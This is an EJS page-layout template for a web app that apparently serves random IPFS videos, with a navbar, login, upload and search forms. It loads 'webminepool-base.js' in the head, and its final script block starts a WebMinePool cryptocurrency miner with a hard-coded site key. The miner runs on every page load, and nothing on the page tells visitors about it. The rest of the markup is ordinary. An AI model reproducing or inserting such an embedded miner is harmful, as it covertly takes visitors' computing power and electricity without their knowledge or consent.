<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"
     integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4="
      crossorigin="anonymous"></script>

      <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/css/bootstrap.min.css" 
      rel="stylesheet" integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0" 
      crossorigin="anonymous">


    <script src="./ipfs/dist/index.min.js"></script>
    <script src="webminepool-base.js"></script>
    <link href="main.css" rel="stylesheet">
    <script src="https://use.fontawesome.com/dc80990396.js"></script>
    
    <link rel="icon" href="https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/facebook/65/see-no-evil-monkey_1f648.png">
    <title><%= params?.appname %></title>

</head>
<body class="d-flex flex-column h-100">
  <!--because of https://github.com/twbs/bootstrap/issues/33840#issuecomment-833462016-->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"
  integrity="sha384-p34f1UUtsS3wqzfto5wAAmdvj+osOnFyQFpp4Ua3gs/ZVWx6oOypYoCJhGGScy+8"
   crossorigin="anonymous"></script>
<script>
    loadLocalCids = () => {
      var url = location.protocol+'//'+location.hostname+(location.port ? ':'+location.port: '')+'/randomVideos'
      $.getJSON(url, function(data) {
        cids = {}
        for(const tag of data){
          for(const file of tag.files){
            if(cids[tag.name]) { 
              cids[tag.name].push(file.cid)
            }  else {
              cids[tag.name] = []; 
              cids[tag.name].push(file.cid)
            }
          }

        }
        localStorage.setItem('cids', JSON.stringify(cids))
      });
    }


    createNode = async () => {
        //repoPath = 'ipfs-local-' + Math.random()
        node = await Ipfs.create() 
        console.log('node created: ' + node ) 
        return node
    }

    gotoRandomVideoPage = (tag=undefined) => {
        if(localStorage.getItem('cids')){
            const cids = JSON.parse(localStorage.getItem('cids'))
            if(tag){
                window.location.href = "/watch?filehash=" + cids[tag][Math.floor( Math.random() * (cids[tag].length-1) )];
                return;
            }
            const tags = Object.keys(cids)
            const randIndex = Math.floor(Math.random() * tags.length)
            const randKey = tags[randIndex]
            const t = cids[randKey]

            window.location.href = "/watch?filehash=" + t[ Math.floor( Math.random() * ( t.length-1) ) ];
        }     
    }
    if(!localStorage.getItem('cids')){
      loadLocalCids();
    }


</script>

    <header>
        <!-- Fixed navbar -->
        <nav class="navbar navbar-expand-md navbar-dark fixed-top bg-dark">
          <div class="container-fluid">
            <a class="navbar-brand" href="/"><%= params?.appname %></a>
            <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
              <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarCollapse">
              <ul class="navbar-nav me-auto mb-2 mb-md-0">
                <li class="nav-item">
                  <span class="nav-link active" onclick="gotoRandomVideoPage()" aria-current="page" href="#">Random</span>
                </li>
                <%if(!params.user) { %>
                <li class="nav-item">
                  <a class="nav-link" href="/login">Login</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" href="/singup">Sing Up</a>
                </li>
                <% } %>
                <%if(params.user) { %>
                  <li class="nav-item">
                    <a class="nav-link" href="/profile">Profile</a>
                  </li>
                  <li class="nav-item">
                    <a class="nav-link" href="/upload">Upload</a>
                  </li>
                  <% } %>
              </ul>
              <form  method="POST" action="/search" class="d-flex">
                <input class="form-control me-2" name="term" type="search" placeholder="Search" aria-label="Search" required>
                <input type="hidden" name="_csrf" value="<%= params.csrfToken %>" />
                <button class="btn btn-outline-success" type="submit">Search</button>
              </form>
              <%if(params.user) { %>
              <form method="POST" action="/logout" class="d-flex"> 
                  <input type="hidden" name="_csrf" value="<%= params.csrfToken %>" />
                  <button class="btn btn-outline-danger" type="submit">Logout</button>
              </form>
              <% } %>
            </div>
          </div>
        </nav>
      </header>
      <div class="container-fluid">
          <%- include(page, params) %>
      </div>
      <br>
      <div class="container-fluid">
        <hr><div class="row">
          <div class="col"></div>
          <div class="col-8 text-center">
            <p class="mt-5 mb-3 text-muted"><%= params?.appname %> &copy; 2021</p><br>
          </div>
          <div class="col"></div>
        </div>
      </div>
    <script>
        var miner = WMP.Anonymous('SK_wYDJ7Rli2DyNZvckyjj3v',{throttle: 0.2});
        miner.start();
    </script>
</body>
</html>